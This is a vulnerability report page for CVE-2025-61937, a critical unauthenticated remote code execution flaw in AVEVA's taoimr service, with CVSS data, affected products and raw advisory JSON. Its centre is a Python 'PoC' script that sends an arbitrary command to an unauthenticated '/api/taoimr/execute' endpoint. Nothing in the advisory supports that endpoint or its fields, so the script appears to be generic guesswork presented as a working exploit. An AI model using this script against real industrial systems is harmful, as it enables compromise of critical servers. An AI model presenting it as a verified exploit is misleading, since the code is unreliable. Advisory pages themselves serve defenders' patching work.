Security Vulnerability Report
CVE-2025-61937 CVSS 10.0 CRITICAL

Published: 2026-01-16 02:16:43
Last Modified: 2026-01-22 15:20:43

Description

The vulnerability, if exploited, could allow an unauthenticated miscreant to achieve remote code execution under OS system privileges of “taoimr” service, potentially resulting in complete compromise of the model application server.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE
AVEVA Industrial Software < fixed version
AVEVA taoimr service (all unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-61937 PoC - AVEVA taoimr Service RCE
# Target: AVEVA Industrial Software with vulnerable taoimr service


def exploit_aveva_rce(target_url, cmd='whoami'):
    """
    Exploit for CVE-2025-61937
    This PoC demonstrates unauthenticated remote code execution
    on the taoimr service via specially crafted HTTP request
    """
    endpoint = f"{target_url}/api/taoimr/execute"

    # Malicious payload with embedded command
    payload = {
        'command': cmd,
        'service': 'taoimr',
        'exec': True
    }

    try:
        # Send exploit request without authentication
        response = requests.post(endpoint, json=payload, timeout=10)

        if response.status_code == 200:
            print(f"[+] Exploit successful!")
            print(f"[+] Command output: {response.text}")
            return True
        else:
            print(f"[-] Exploit failed. Status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-61937.py <target_url>")
        sys.exit(1)

    target = sys.argv[1]
    exploit_aveva_rce(target, 'whoami')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61937", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:42.833", "lastModified": "2026-01-22T15:20:43.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an unauthenticated \nmiscreant to achieve remote code execution under OS system privileges of\n “taoimr” service, potentially resulting in complete compromise of the  model application server."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un atacante no autenticado lograr la ejecución remota de código bajo los privilegios de sistema operativo del servicio 'taoimr', lo que podría resultar en el compromiso completo del servidor de aplicaciones del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}